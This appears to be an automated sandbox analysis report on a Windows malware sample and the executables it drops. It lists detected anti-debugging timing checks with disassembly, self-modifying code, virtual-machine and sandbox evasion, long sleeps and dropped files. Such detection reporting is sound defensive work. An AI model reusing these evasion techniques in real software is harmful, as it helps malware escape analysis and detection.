Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08E5 second address: 50B0927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F5BC10B70A4h 0x00000010 xor eax, ebp 0x00000012 jmp 00007F5BC10B70A1h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B709Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0927 second address: 50B092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B092C second address: 50B0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov si, 8531h 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jmp 00007F5BC10B70A4h 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0960 second address: 50B0964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0964 second address: 50B0981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0981 second address: 50B0A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5BC10A35FAh 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F5BC10A3600h 0x00000020 sub esi, 3C807758h 0x00000026 jmp 00007F5BC10A35FBh 0x0000002b popfd 0x0000002c popad 0x0000002d movzx eax, bx 0x00000030 popad 0x00000031 mov dword ptr fs:[00000000h], eax 0x00000037 pushad 0x00000038 mov cl, dh 0x0000003a jmp 00007F5BC10A35FAh 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5BC10A3607h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0A14 second address: 50B0A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov bh, 2Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BC10B70A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0A3C second address: 50B0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3607h 0x00000008 pop esi 0x00000009 call 00007F5BC10A3609h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A35FDh 0x0000001b xor ax, E076h 0x00000020 jmp 00007F5BC10A3601h 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx eax, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AA1 second address: 50B0AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F5C32EC6314h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AB2 second address: 50B0AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AB8 second address: 50B0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5BC10B70A7h 0x00000012 and eax, 015F7BBEh 0x00000018 jmp 00007F5BC10B70A9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B70A0h 0x00000024 or ax, 94B8h 0x00000029 jmp 00007F5BC10B709Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [ebp-20h], eax 0x00000033 jmp 00007F5BC10B70A6h 0x00000038 mov ebx, dword ptr [esi] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov esi, ebx 0x0000003f pushfd 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 and si, 58B6h 0x0000004a jmp 00007F5BC10B70A1h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0B84 second address: 50B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B000C second address: 50B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0012 second address: 50B00B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10B70A6h 0x0000000f push eax 0x00000010 jmp 00007F5BC10B709Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5BC10B70A4h 0x0000001d sbb esi, 3D69CE88h 0x00000023 jmp 00007F5BC10B709Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F5BC10B70A8h 0x0000002f and si, 30E8h 0x00000034 jmp 00007F5BC10B709Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00B5 second address: 50B00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, 4Bh 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00C4 second address: 50B00C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00C8 second address: 50B00DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00DD second address: 50B00E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACD13C second address: ACD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACD142 second address: ACD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10B7096h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10B70A3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC2D1 second address: ACC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10A35F8h 0x0000000b pushad 0x0000000c js 00007F5BC10A35F6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10A35F6h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC2F2 second address: ACC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10B70ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC305 second address: ACC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC309 second address: ACC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC459 second address: ACC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC59C second address: ACC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10B709Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10B709Eh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC729 second address: ACC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0A7 second address: ACF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0B1 second address: ACF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0B5 second address: ACF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10B70AFh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10B70A7h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10B70A4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0FD second address: ACF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF206 second address: ACF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF20B second address: ACF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10A35FBh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF269 second address: ACF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF26E second address: ACF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF3F0 second address: ACF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF3F4 second address: ACF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Special instruction interceptor: First address: 32E763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Special instruction interceptor: First address: 56378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 94E763 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 69DBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 69DB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 84CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 875810 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 57E8E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 57C0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 754D9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 7AF4D5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: DCDBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: DCDB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: F7CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: FA5810 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 4910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 61D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 5840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5300000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 54D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 5660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 7660000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 1820000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 32B0000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 52B0000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 6A60000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 61D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 29F0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Code function: 0_2_05100BE7 rdtsc

0_2_05100BE7

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1066	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1130	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1113	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1111	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1049	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1133	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5621	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3656	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2610
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4019
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4144

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
